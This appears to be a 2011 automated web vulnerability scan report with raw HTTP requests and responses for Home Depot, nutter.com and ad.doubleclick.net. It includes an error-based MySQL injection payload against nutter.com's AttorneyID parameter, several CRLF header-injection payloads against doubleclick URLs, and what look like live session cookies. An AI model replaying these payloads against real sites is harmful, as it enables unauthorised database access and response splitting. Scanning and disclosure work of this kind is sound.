Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22115%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24161%2c885%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816967%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224966318%3a%3bC25%5fEXP%3d1360064966%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:27 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228567648%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cIo18Uw%2bNrkVVDLmy9wcANV3r%2f%2bE%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&catalogId=10053%00''&quantity=1&orderItemId_0=330520025&orderItemId=330520025&langId=-1&catEntryId=202562705&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224029646%3a%3bC25%5fEXP%3d1360064029%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630141%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cwD0O4YDr3%2f35oqr%2b4vJ6YCxfvjU%3d

Response 2 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:49:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:49:41 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224978318%3a%3bC25%5fEXP%3d1360064978%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:38 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224978318%3a%3bC25%5fEXP%3d1360064978%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:38 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22116%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24163%2c284%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816978%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224978318%3a%3bC25%5fEXP%3d1360064978%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:38 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228578979%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2c8qveuGAl9W05TXvVDWRecbIcxoE%3d;Domain=.homedepot.com;Path=/


1.74. http://www.nutter.com/attorneys.php [AttorneyID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The AttorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AttorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:20 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 22671

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELECT FirstName,LastName FRO
...[SNIP]...

1.75. http://www.nutter.com/attorneys.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit/1'+1)) HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:25 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 22679

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\' 1))' at line 1 | 1064<BR>sql: SELECT FirstName,LastNa
...[SNIP]...

2. HTTP header injection  previous  next
There are 26 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d9fc1%0d%0a6b3dc4ec589 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d9fc1%0d%0a6b3dc4ec589;src=1948992;type=wsjre849;cat=publi675;ord=5535785951651.633? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/d9fc1
6b3dc4ec589
;src=1948992;type=wsjre849;cat=publi675;ord=5535785951651.633:
Date: Thu, 16 Jun 2011 11:23:29 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.specificmedia.com/B4970757.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4ff25%0d%0ae23aa2286a8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4ff25%0d%0ae23aa2286a8/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=124110;b=740428;ts=20110616104458
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4ff25
e23aa2286a8
/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http: //clk.specificclick.net/click/v=5;m=2;l=4749;c=124110;b=740428;ts=1308235498;dct=;ord=1308235498
Date: Thu, 16 Jun 2011 14:46:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.RealMedia/B5598690.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3738f%0d%0a1fc365d485d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3738f%0d%0a1fc365d485d/N5823.RealMedia/B5598690.4;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3738f
1fc365d485d
/N5823.RealMedia/B5598690.4;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62
Date: Thu, 16 Jun 2011 15:53:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.RealMedia/B5598690.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9d630%0d%0a3989d204e3c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9d630%0d%0a3989d204e3c/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9d630
3989d204e3c
/N5823.RealMedia/B5598690.8;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62
Date: Thu, 16 Jun 2011 16:03:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 587d7%0d%0a016d0289655 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /587d7%0d%0a016d0289655/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/587d7
016d0289655
/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=8144814481448144;:
Date: Thu, 16 Jun 2011 11:23:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/forgotpassword

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7c02a%0d%0a9333c1f4750 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7c02a%0d%0a9333c1f4750/interactive.wsj.com/forgotpassword;mc=b2pfreezone;tile=1;sz=377x50;ord=3076307630763076; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7c02a
9333c1f4750
/interactive.wsj.com/forgotpassword;mc=b2pfreezone;tile=1;sz=377x50;ord=3076307630763076;:
Date: Thu, 16 Jun 2011 11:25:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/front_nonsub

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 57946%0d%0a3ad065f0f29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /57946%0d%0a3ad065f0f29/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=280x46;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/57946
3ad065f0f29
/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=280x46;ord=8144814481448144;:
Date: Thu, 16 Jun 2011 11:23:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N1057.280341.AOL.COMADVERTISING/B5447531.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49a4e%0d%0afea689c0339 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49a4e%0d%0afea689c0339/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001024394/cstr=54039788=_4dfa4b0b,6354081067,768034%5E1024394%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=54039788/optn=64?trg=;ord=6354081067? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248841013&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
